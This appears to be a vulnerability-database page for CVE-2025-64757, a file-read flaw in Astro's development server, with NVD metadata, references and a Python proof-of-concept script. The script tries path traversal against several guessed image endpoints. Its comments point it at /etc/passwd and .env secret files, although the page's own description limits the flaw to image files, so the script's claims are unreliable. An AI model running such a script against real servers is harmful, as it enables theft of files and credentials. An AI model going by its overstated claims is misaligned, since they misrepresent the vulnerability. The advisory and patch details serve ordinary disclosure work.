CVE-2025-64757

Description

Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:* - VULNERABLE

Astro < 5.14.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64757 PoC - Astro Framework Local File Read
# Affected Version: Astro < 5.14.3
# Attack Vector: Path traversal via image optimization endpoint

import requests
import sys
import urllib.parse

def exploit_astro_lfi(target_url, file_path):
    """
    Exploit Astro development server local file read vulnerability
    
    Args:
        target_url: Base URL of the vulnerable Astro dev server
        file_path: Path to the file to read (e.g., ../../../etc/passwd)
    
    Returns:
        File content if successful, None otherwise
    """
    # Construct the malicious URL with path traversal
    # The image optimization endpoint typically handles image requests
    encoded_path = urllib.parse.quote(file_path)
    
    # Try different endpoint patterns
    endpoints = [
        f"{target_url}/_image",
        f"{target_url}/@astroimage",
        f"{target_url}/image",
        f"{target_url}/__astro/image"
    ]
    
    for endpoint in endpoints:
        try:
            # Method 1: GET request with path parameter
            params = {
                'url': file_path,
                'w': '100',
                'h': '100'
            }
            
            response = requests.get(endpoint, params=params, timeout=10)
            
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Success! File read via {endpoint}")
                return response.content
            
            # Method 2: Direct path traversal in URL
            exploit_url = f"{endpoint}?f={file_path}"
            response = requests.get(exploit_url, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] Success! Direct path traversal worked")
                return response.content
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with {endpoint}: {e}")
            continue
    
    return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python poc.py <target_url> <file_path>")
        print("Example: python poc.py http://localhost:4321 ../../../etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    
    print(f"[*] Target: {target}")
    print(f"[*] Attempting to read: {file_path}")
    
    result = exploit_astro_lfi(target, file_path)
    
    if result:
        print("\n[+] File Content:")
        print(result.decode('utf-8', errors='ignore'))
    else:
        print("[-] Exploitation failed - target may not be vulnerable or file not accessible")

if __name__ == "__main__":
    main()

# Additional attack examples:
# Read environment file: python poc.py http://target:4321 ../../../.env
# Read package.json: python poc.py http://target:4321 ../package.json
# Read system file: python poc.py http://target:4321 ../../../../etc/hosts

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64757
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64757
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64757/
[4] VulDB https://vuldb.com/cve/CVE-2025-64757
[5] https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7
[6] https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64757", "sourceIdentifier": "[email protected]", "published": "2025-11-19T17:15:52.460", "lastModified": "2025-11-20T17:58:21.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "5.14.3", "matchCriteriaId": "48394CBD-D26B-4176-875E-32B9467D6157"}]}]}], "references": [{"url": "https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}